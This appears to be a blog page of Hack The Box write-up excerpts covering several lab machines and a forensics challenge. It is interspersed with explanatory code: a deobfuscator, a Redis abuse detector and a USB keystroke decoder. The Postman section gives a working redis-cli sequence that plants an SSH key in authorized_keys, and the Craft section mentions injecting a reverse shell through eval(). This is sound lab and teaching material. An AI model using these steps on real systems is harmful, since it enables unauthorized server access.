Ben Busby Projects, writeups, ideas, announcements, other random junk

HTB: JSON (Windows Machine)

Hack The Box - “JSON” - Windows - 10.10.10.158

Completed: December 17th, 2019

Retired: February 15th, 2020

User

I initially tried the same basic enumeration approach I have taken on other Windows machines, but that didn’t seem to be of much help. The extent of the info I received was that there was a web service running on port 80, various RPC ports open, and a FileZilla port. When I visited the web site, I was shown a simple login form that was controlled by a few AngularJS scripts and one custom script that had been heavily uglified to prevent snooping. I performed a mixture of manual and online de-uglifying and renaming of variables to finally get something that I could decipher.

'use strict';
/** @type {!Array} */
var _0xd18f = ["principalController", "$http", "$scope", "$cookies", "OAuth2", "get", "UserName", "Name", "data", "remove", "href", "location", "login.html", "then", "/api/Account/", "controller", "loginController", "credentials", "", "error", "index.html", "login", "message", "Invalid Credentials.", "show", "log", "/api/token", "post", "json", "ngCookies", "module"];
angular["module"]("json", ["ngCookies"])["controller"]("loginController", ["$http", "$scope", "$cookies", function(symAttrs, data, i) {
  data["credentials"] = {
    UserName : "",
    Password : ""
  };
  data["error"] = {
    message : "",
    show : false
  };
  var OAuth2 = i["get"]("OAuth2");
  if (OAuth2) {
    /** @type {string} */
    window["location"]["href"] = "index.html";
  }
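The de-uglifying step described above is mechanical enough to script. The `_0xd18f` array is a string table: every literal the script needs is stored in it, and the code refers to entries by index (`_0xd18f[30]` for `"module"`, and so on). The helper below, an added example that is not the writeup's own tooling, resolves those index references back to string literals and then rewrites `obj["prop"]` to `obj.prop`. The string table is the one shown above; the obfuscated code lines it is applied to are a constructed fragment in the same style, not the site's real script, and the `_0x1a`/`_0x2b`/`_0x3c`/`_0x4d` parameter names are placeholders.

```python
import ast
import json
import re

# Resolver for string-table obfuscation: `var _0xd18f = [...]` holds every string,
# and the code refers to them by index. Added example, not the writeup's tooling.

TABLE_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*(\[.*?\]);', re.S)
# `foo["bar"]` -> `foo.bar`, but only when preceded by an identifier, `)` or `]`,
# so that array literals such as `["ngCookies"]` are left untouched.
MEMBER_RE = re.compile(r'(?<=[\w$)\]])\["([A-Za-z_$][\w$]*)"\]')


def load_string_table(js_source):
    """Return (table_name, list_of_strings) for the first `var _0x... = [...]`."""
    m = TABLE_RE.search(js_source)
    if m is None:
        raise ValueError("no string table found")
    # A JS array of double-quoted strings is also a valid Python list literal
    return m.group(1), list(ast.literal_eval(m.group(2)))


def resolve_string_table(js_source):
    """Replace every `<table>[N]` reference with the literal string it indexes."""
    name, table = load_string_table(js_source)
    ref = re.compile(re.escape(name) + r'\[(\d+)\]')
    return ref.sub(lambda m: json.dumps(table[int(m.group(1))]), js_source)


def bracket_to_dot(js_source):
    """Rewrite computed member access with a string literal to dot notation."""
    return MEMBER_RE.sub(r'.\1', js_source)


def deobfuscate(js_source):
    return bracket_to_dot(resolve_string_table(js_source))


# Constructed input: the real string table from the page plus a fragment written in
# the same obfuscated style (parameter names are placeholders).
SAMPLE_OBFUSCATED = '''\
var _0xd18f = ["principalController", "$http", "$scope", "$cookies", "OAuth2", "get", "UserName", "Name", "data", "remove", "href", "location", "login.html", "then", "/api/Account/", "controller", "loginController", "credentials", "", "error", "index.html", "login", "message", "Invalid Credentials.", "show", "log", "/api/token", "post", "json", "ngCookies", "module"];
angular[_0xd18f[30]](_0xd18f[28], [_0xd18f[29]])[_0xd18f[15]](_0xd18f[16], [_0xd18f[1], _0xd18f[2], _0xd18f[3], function(_0x1a, _0x2b, _0x3c) {
  var _0x4d = _0x3c[_0xd18f[5]](_0xd18f[4]);
  if (_0x4d) { window[_0xd18f[11]][_0xd18f[10]] = _0xd18f[20]; }
}]);
'''

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_OBFUSCATED))
```

Run it against a saved copy of the script instead of the sample to get output in the shape shown above; renaming the short parameter names is still a manual step, since only a human can pick meaningful names from how each value is used.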

HTB: Postman (Linux Machine)

Hack The Box - “Postman” - Linux - 10.10.10.160

Completed: December 7th, 2019

Retired: March 12th, 2020

Foothold / User

Nmap scan of all ports turned up a couple of interesting clues:

  • Redis running on port 6379 (lots of info online about a pertinent vulnerability)
  • Webmin v1.91 (also lots of info online about the vuln there) on port 10000

I wasn’t too familiar with redis, but did enough digging to come up with a way of accessing redis-cli on the server.

ssh-keygen -t rsa

(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt

redis-cli -h 10.10.10.160 flushall
cat key.txt | redis-cli -h 10.10.10.160 -x set crackit
redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/
redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys"
redis-cli -h 10.10.10.160 save
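From the defender's side, the sequence above (FLUSHALL, SET, CONFIG SET dir, CONFIG SET dbfilename, SAVE) is exactly what Redis's own MONITOR stream shows, and it has no legitimate counterpart in normal application traffic. The script below is an added example, not part of this writeup: it parses MONITOR-format lines and raises alerts for runtime changes to the persistence path, for a dump filename without the .rdb extension, for a dump directory under .ssh, and for a SAVE that follows both CONFIG SET calls from the same client within a time window. The MONITOR lines are constructed; the client address 192.0.2.10 and the truncated key material are placeholders.

```python
import re
from dataclasses import dataclass

# Detection over `redis-cli MONITOR` output for runtime persistence-path abuse.
# Added example, not part of the original writeup; sample lines are constructed.

# One MONITOR line: <epoch> [<db> <client-addr>] "cmd" "arg" ...
MONITOR_RE = re.compile(
    r'^\+?(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
# Each argument is double-quoted; backslash escapes such as "\n" may appear inside
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')


@dataclass
class Alert:
    ts: float
    client: str
    reason: str


def parse_monitor_line(line):
    """Return (timestamp, client, [args]) or None for a line that is not MONITOR output."""
    m = MONITOR_RE.match(line.strip())
    if m is None:
        return None
    return float(m.group("ts")), m.group("client"), ARG_RE.findall(m.group("args"))


def scan_monitor(lines, window=60.0):
    """Alert on CONFIG SET dir/dbfilename at runtime, on suspicious values, on FLUSHALL,
    and on a SAVE issued within `window` seconds of both CONFIG SET calls by one client."""
    alerts = []
    pending = {}  # client -> {"dir": ts, "dbfilename": ts}
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        ts, client, args = parsed
        cmd = [a.lower() for a in args[:3]]  # Redis command names are case-insensitive
        if cmd[:2] == ["config", "set"] and len(args) >= 4:
            key, value = cmd[2], args[3]
            if key in ("dir", "dbfilename"):
                alerts.append(Alert(ts, client, f"runtime CONFIG SET {key} = {value!r}"))
                pending.setdefault(client, {})[key] = ts
                if key == "dir" and "/.ssh" in value:
                    alerts.append(Alert(ts, client, "dump directory points into a .ssh directory"))
                if key == "dbfilename" and not value.lower().endswith(".rdb"):
                    alerts.append(Alert(ts, client, f"dump filename without .rdb extension: {value!r}"))
        elif cmd[:1] in (["save"], ["bgsave"]):
            seen = pending.get(client, {})
            if "dir" in seen and "dbfilename" in seen and ts - min(seen.values()) <= window:
                alerts.append(Alert(ts, client,
                                    "SAVE after dir+dbfilename change: dump written to a client-chosen path"))
                pending.pop(client)
        elif cmd[:1] == ["flushall"]:
            alerts.append(Alert(ts, client, "FLUSHALL: dataset wiped before a crafted dump"))
    return alerts


# Constructed MONITOR capture mirroring the command sequence in the writeup
SAMPLE_MONITOR = """\
1576000001.100000 [0 192.0.2.10:50112] "flushall"
1576000002.200000 [0 192.0.2.10:50112] "set" "crackit" "\\n\\nssh-rsa AAAAB3...placeholder...\\n\\n"
1576000003.300000 [0 192.0.2.10:50112] "config" "set" "dir" "/var/lib/redis/.ssh/"
1576000004.400000 [0 192.0.2.10:50112] "config" "set" "dbfilename" "authorized_keys"
1576000005.500000 [0 192.0.2.10:50112] "save"
1576000006.600000 [0 127.0.0.1:40000] "get" "session:abc"
"""

if __name__ == "__main__":
    for a in scan_monitor(SAMPLE_MONITOR.splitlines()):
        print(f"{a.ts:.3f} {a.client} {a.reason}")
```

Detection is the fallback; the fix is to not expose the instance in the first place (bind to localhost or a private interface, keep `protected-mode yes`, set `requirepass`, and use `rename-command CONFIG ""` so runtime changes to `dir`/`dbfilename` are impossible from the wire).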

HTB: Deadly Arthropod (Forensics Challenge)

Description

Our operatives have intercepted critical information. Origin? Classified. Objective: Retrieve the flag!

Completed: December 26th, 2019

Retired: Yes, but not sure when

Solution

The challenge included a zipped pcap file that contained USB data, so first we extract keystroke data from the pcap file:

tshark -r deadly_arthropod.pcap -T fields -e usb.capdata > keystrokes.txt
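Each line that tshark writes is one 8-byte USB HID boot-protocol keyboard report: byte 0 holds the modifier bits (left Shift is 0x02, right Shift is 0x20), byte 1 is reserved, and bytes 2 to 7 list the usage IDs of up to six keys currently pressed. Turning the dump back into text means mapping usage IDs to characters, applying Shift, honouring Backspace, and ignoring the all-zero release reports. The decoder below is an added example, not the writeup's own script; the capture lines in it are constructed rather than taken from the challenge pcap, and it only reads the first key slot (byte 2), which is all a typed-text capture normally uses. Depending on the tshark version, the bytes come out with or without `:` separators, and both forms are accepted.

```python
# Decoder for USB HID keyboard reports as dumped by `tshark -T fields -e usb.capdata`
# (one report per line). Added example, not part of the original writeup; the sample
# capture below is constructed.

# Keyboard usage IDs (USB HID Usage Tables, keyboard/keypad page): (unshifted, shifted)
KEYMAP = {}
for i, c in enumerate("abcdefghijklmnopqrstuvwxyz"):
    KEYMAP[4 + i] = (c, c.upper())                       # 0x04..0x1d
for i, (c, s) in enumerate(zip("1234567890", "!@#$%^&*()")):
    KEYMAP[30 + i] = (c, s)                              # 0x1e..0x27
KEYMAP.update({
    40: ("\n", "\n"), 43: ("\t", "\t"), 44: (" ", " "),  # Enter, Tab, Space
    45: ("-", "_"), 46: ("=", "+"), 47: ("[", "{"), 48: ("]", "}"),
    49: ("\\", "|"), 51: (";", ":"), 52: ("'", '"'), 53: ("`", "~"),
    54: (",", "<"), 55: (".", ">"), 56: ("/", "?"),
})
BACKSPACE = 42            # 0x2a
SHIFT_MASK = 0x02 | 0x20  # left-shift and right-shift bits of the modifier byte


def parse_report(line):
    """Return (modifiers, keycode) for one usb.capdata line, or None when the line
    is not an 8-byte keyboard report (empty lines, other USB traffic)."""
    hexstr = line.strip().replace(":", "")
    if len(hexstr) != 16:
        return None
    report = bytes.fromhex(hexstr)
    # byte 0 = modifiers, byte 1 = reserved, bytes 2..7 = pressed keys (first slot used)
    return report[0], report[2]


def decode_keystrokes(lines):
    """Reconstruct the typed text from a sequence of usb.capdata lines."""
    typed = []
    prev = 0
    for line in lines:
        parsed = parse_report(line)
        if parsed is None:
            continue
        modifiers, keycode = parsed
        if keycode == prev:       # same key still held (or repeated idle report)
            continue
        prev = keycode
        if keycode == 0:          # release report: nothing new was pressed
            continue
        if keycode == BACKSPACE:
            if typed:
                typed.pop()
            continue
        entry = KEYMAP.get(keycode)
        if entry is None:         # arrows, function keys, etc. are not printable
            continue
        typed.append(entry[1] if modifiers & SHIFT_MASK else entry[0])
    return "".join(typed)


# Constructed sample: Shift+h, i, Space, x, Backspace, 1, Shift+1 -> "Hi 1!"
SAMPLE_CAPDATA = """\
02:00:0b:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0c:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2c:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1b:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2a:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1e:00:00:00:00:00
00:00:00:00:00:00:00:00
20:00:1e:00:00:00:00:00
00:00:00:00:00:00:00:00
"""

if __name__ == "__main__":
    print(decode_keystrokes(SAMPLE_CAPDATA.splitlines()))
```

To use it on the real dump, pass the lines of `keystrokes.txt` to `decode_keystrokes` instead of the sample. If the output looks like gibberish, check whether the capture also carries non-keyboard interrupt traffic (a mouse, for instance) with 8-byte payloads, and filter by USB device address in tshark first.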

HTB: Bitlab (Linux Machine)

Hack The Box - “Bitlab” - Linux - 10.10.10.114

Completed: December 10th, 2019

Retired: January 9th, 2020

Foothold

This machine was running an older version of Gitlab. A quick nmap showed that the machine had port 80 open, so I started with a nikto scan on the target:

[email protected]:~
└──> nikto -h 10.10.10.114
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.114
+ Target Hostname:    10.10.10.114
+ Target Port:        80
+ Start Time:         2019-12-09 15:00:55 (GMT-7)
<snip>
+ Root page / redirects to: http://10.10.10.114/users/sign_in
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/autocomplete/users/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/search/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Server banner has changed from 'nginx' to 'Apache/2.4.29' which may suggest a WAF, load balancer or proxy is in place
+ Entry '/profile/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /help/: Directory indexing found.
+ Entry '/help/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/users/sign_in/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 55 entries which should be manually viewed.
+ /help/: Help directory should not be accessible
<snip>

I’m fairly familiar with using Gitlab, so I navigated through their instance until I stumbled across a user named “clave”, whose profile was publicly visible to non-logged-in users.

HTB: Craft (Linux Machine)

Hack The Box - “Craft” - Linux - 10.10.10.110

Completed: December 20th, 2019

Retired: January 4th, 2020

Foothold

A quick scan of the IP revealed an HTTPS-only site running on port 443. Visiting it showed a splash page for a craft beer web app with links to api.craft.htb and gog.craft.htb (git repo hosting, similar to gitlab/github). Adding both hostnames to my /etc/hosts let me view some API routes, and messages on GOG led me to a temporary shell.

On GOG, a user Dinesh (the machine was Silicon Valley themed) opened an issue about how ABV wasn't being checked properly, so he committed a change in which a Python eval() call was used to check the ABV. Elsewhere in the repo was a test script written in Python that I was able to modify to inject a reverse shell (code below).